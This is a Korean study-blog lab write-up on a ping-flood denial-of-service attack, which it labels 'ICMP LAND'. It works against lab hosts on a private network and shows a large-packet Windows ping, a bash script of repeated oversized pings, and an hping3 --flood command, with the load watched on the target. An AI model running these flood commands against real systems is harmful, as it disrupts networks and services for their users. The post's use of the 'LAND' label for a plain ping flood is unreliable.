본문 바로가기

Learning/└◆Network Hacking

네트워크 해킹 - 05. ICMP LAND Attack (Dos Attack)

ICMP LAND 공격 (Dos Attack)

ICMP LAND ATTACK

ICMP 메세지를 시스템, 서버, 전송 장비에게 대량으로 전송하여 네트워크 및 시스템 부하를

발생시키는 공격이다. 

 

Ex1) ICMP LAND Attack 1

 

<Linux200>

gnome-system-monitor 실행

# gnome-system-monitor &

 

<Window2008>

C:\Users\administrator>ping 192.168.20.200 -t -l 50000

...

...

192.168.20.200의 응답: 바이트=50000 시간=1ms TTL=64

Ctrl + C

<Linux200>

gnome-system-monitor 확인 (Network History 모니터링)

 

 

Ex2) ICMP LAND Attack 2

 

<Window2008>

작업 관리자 실행(Ctrl + Shift + Esc) -> 네트워킹

 

<Kali Linux>

ICMP LAND 공격 툴 제작

# mkdir -p /root/bin ; cd /root/bin

# vi ping.sh

 #!/bin/bash

 

ping -s 62000 192.168.20.201 &

sleep 10

 

ping -s 62000 192.168.20.201 &

sleep 10

 

ping -s 62000 192.168.20.201 &

sleep 10

# chmod +x ping.sh

Window2008로 ping attack

# ./ping.sh 192.168.20.201

....

....

Ctrl + C

# pkill ping

# rm ping.sh

 

<Window2008>

작업 관리자 네트워킹 확인

 

 

Ex3) ICMP LAND Attack 3

 

<Kali Linux>

hping3 를 이용한 공격

-1 : icmp scan

--flood : flooding

-p : port number

-d : data size

# hping3 -1 192.168.20.201 --flood -p 80 -d 62000

 

<Window2008>

작업 관리자 네트워킹 확인

 

위와 같은 부하량을 주는 명령어 및 프로그램은 대상에게 1% 정도의 이용률을 줄수 있다면

같은 동작을 100번 수행 한다면 대상 네트워크 이용률을 100% 과부하를 줄 수 있다.

 

관련 참고내용

http://hyess.tistory.com/admin/entry/post/?id=239